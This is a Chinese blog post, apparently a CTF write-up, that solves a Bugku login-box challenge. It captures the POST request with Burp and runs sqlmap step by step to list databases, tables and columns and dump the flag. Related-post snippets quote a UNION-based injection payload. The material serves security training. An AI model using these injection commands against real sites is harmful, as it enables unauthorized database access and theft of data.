bugku 这是个神奇的登陆框

于 2019-07-23 14:48:50 发布
阅读量159 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wssmiss/article/details/96993126
版权

题目

链接:http://123.206.87.240:9001/sql/

输入admin ,admin 没有回显。
根据url的提示很明显是一个sql注入。
用burpsuit抓包,放到sqlmap里跑一下看看
在这里插入图片描述
右键保存至桌面为“1.txt”
打开sqlmap,输入指令

sqlmap -r "1.txt" -p admin_name --dbs

-r 表示读文件 。-p为指定参数 --dbs代表获取当前数据库名
在这里插入图片描述
在这里插入图片描述
获得数据库名字,当前数据库应该是bugkusql1

下面开始爆表

sqlmap -r "1.txt" -p admin_name -D bugkusql1 --tables

在这里插入图片描述
在这里插入图片描述
可以确定当前flag所在表是flag1

开始爆列名

sqlmap -r "1.txt" -p admin_name -D bugkusql1 -T flag1 --columns

在这里插入图片描述
爆出字段名为flag1

爆内容

sqlmap -r "1.txt" -p admin_name -D bugkusql1 -T flag1 -C flag1 --dump

–dump意思是获取字段内容
之后一路回车可以看到flag了
在这里插入图片描述

wssmiss
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bugku ctf 这是一个神奇登陆
qq_42777804的博客
08-02 976
打开后随便输入账号密码会出现 那就老规矩 burp抓包 当你使用 " 时 会报错 !!!tips:之后使用的sql注入是我写的第一篇sql注入格式的内容,感兴趣的可以看一下 https://blog.csdn.net/qq_42777804/article/details/81226567 admin_name=1"&admin_passwd=1&su...
bugku-这是一个神奇登陆
yangker12148的博客
05-29 537
打开http://123.206.87.240:9001/sql/后是个登陆界面 查看源代码 于是考虑到sql注入,因为是post,所以将burp的抓到的包保存到1.txt中,用sqlmap抓包 命令:sqlmap.py -r 1.txt -p admin_name --dbs//爆数据库名 后续在保表、列以及数据 命令sqlmap.py -r 1.txt -p admin_name -D ...
BugkuCTF 这是一个神奇登陆
3tu6b0rn的博客
05-15 350
post注入 直接跑sqlmap吧 抓包到本地 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" admin_name存在注入点 查数据库 sqlmap.py -r "C:\Users\联想\Desktop\1.txt" --dbs sqlmap.py -r "C:\Users\联想\Desktop\1.txt" -D bugkusql1 --tabl...
bugku 一个神奇登陆--POST型SQL注入
a1004070060的博客
06-29 795
解题链接:http://123.206.87.240:9001/sql/ 解题过程: 本题并未给出什么提示,首先考虑到弱口令登录,BP抓包后加载send to intruder,加载字典后爆破无果。然后考虑到之前做的题目,尝试用御剑扫描一下后台,也没发现什么线索,这时才注意到页面的title,原来这道题目与SQL注入相关,考虑到user和pass字段都是通过post方法传递,所以本题应...
Bugku-CTF之这是一个神奇登陆
weixin_34166472的博客
06-11 275
Day32 这是一个神奇登陆 http://123.206.87.240:9001/sql/ flag格式flag{} 本题要点:sqlmap神器使用、burpsuit抓包 查看一下源码 是post提交,url明显提示是个sql注入,由于post提交,要sql和burp结合起来使用。 首先burp抓包,抓到包后选择存到tx...
bugku-这是一个神奇登陆(附代码)(详细)
偷一个月亮
06-20 893
题目链接:http://123.206.87.240:9001/sql/ 数据库 表名 列名 select flag 代码 admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GO admin_name=admin" union select (s...
bugku----这是一个神奇登陆
weixin_43803070的博客
07-07 509
此题是sqlmap+burp结合完成的,打开一看是一个登陆架,url显示sql,想必是post型的sql注入。 查看注入点: 首先burp抓包,抓到包后选择存到txt文件中:(随便输入账号密码): root@kali:~# sqlmap -r '/root/桌面/2.txt' -p admin_name --dbs// -r是读文件 后面是刚才保存的绝对路径,-p是参数,也就是注入点(选了a...
BugkuCTF之web题之这是一个神奇登陆
A_dmin的博客
12-09 9995
BugkuCTF之web题之这是一个神奇登陆 打开网页之后发现: 随便输入账号和密码出现: 那就开始寻找注入点吧,输入0’发现还是: 输入0" 发现报错: 确定可以注入,判断字段有多少个 0"order by 1,2,3# 发现: 说明有两列。 输入 0" union select database(),2# ,得到库名: 继续输入 0" union select table_na...
[Bugku-AWD专版]一款用于AWD比赛中的自动化攻击架.zip
最新发布
09-30
在【YML-AWD-FRAME-FOR-BUGKU-master】这个主目录下,我们可以找到整个架的源代码、配置文件和其他相关资源。 1. **架结构**:架通常包含以下几个关键部分: - **核心引擎**:执行自动化攻击的主程序,负责...
BugKu杂项QAQ反编译完整版
07-21
"BugKu杂项QAQ反编译完整版"是指针对BugKu平台上的一个MISC(Miscellaneous)类问题,该问题涉及到一个名为"QAQ"的挑战,可能是一个编程或解谜类型的题目。由于在线反编译工具可能无法提供完整的结果,这里提供了一...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku《1和0的故事.txt》
07-24
大佬可以试试
http中的XFF(X-Forwarded-For)
wssmiss的博客
07-21 8309
详细知识请移步大佬网页
Bugku web基础题(get 、post)
wssmiss的博客
03-01 1537
web基础get: web基础post: burp抓包,改包,报头改为POST,结尾加上参数what=flag 矛盾: 不是数字则输出,进入下一个if判断,是1才输出flag。利用php的特点,输入1a,1b,1c 。。。 再判断是否为数字时,不是数字,与1比较时 是 1 域名解析: 首先在终端需要管理员权限 进入/etc/hosts 修改映射 打开浏览器拿flag 你必须让他停下: 查...
BugKu:cookies 欺骗
wssmiss的博客
03-25 1513
题目链接 http://123.206.87.240:8002/web11/ 查看源码后没有可用信息 观察url发现参数filename的值加密了 解密后filename=keys.txt 尝试用修改参数filename的值为index.php(注意此处要用base64加密为aW5kZXgucGhw) 发现参数line没有给值,随意赋值如3,出现 写脚本抓原代码,先试一下有多少行,100,50...
bugku INSERT INTO注入(基于时间的盲注,详细教程)
wssmiss的博客
07-22 1433
题目 链接地址:http://123.206.87.240:8002/web15/ 分析 打开页面后: 分析页面的php代码 通过源码分析,注入点在x-forwarded-for:client,proxy1,proxy2的clienr处。获取用户ip,并把ip插入到client_ip表中的ip列中 因为源码第一行,关闭了错误报告,所以没有回显。在此采取基于时间的盲注 ...
bugku 网站被黑(后台目录,爆破)
wssmiss的博客
07-21 1368
题目 分析 上御剑扫后台目录,发现webshell/shell.php ,打开网页 爆破得到密码hack
解密Bugku CTFMisc挑战:社工与二维码解析
"bugku ctf misc wp.pdf 是一个关于CTF比赛解题的writeup,主要涉及了社工和编码解密方面的知识。" 在CTF(Capture The Flag)竞赛中,"Misc"通常指的是各种混合类题目,涵盖广泛的知识领域,包括但不限于密码学、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值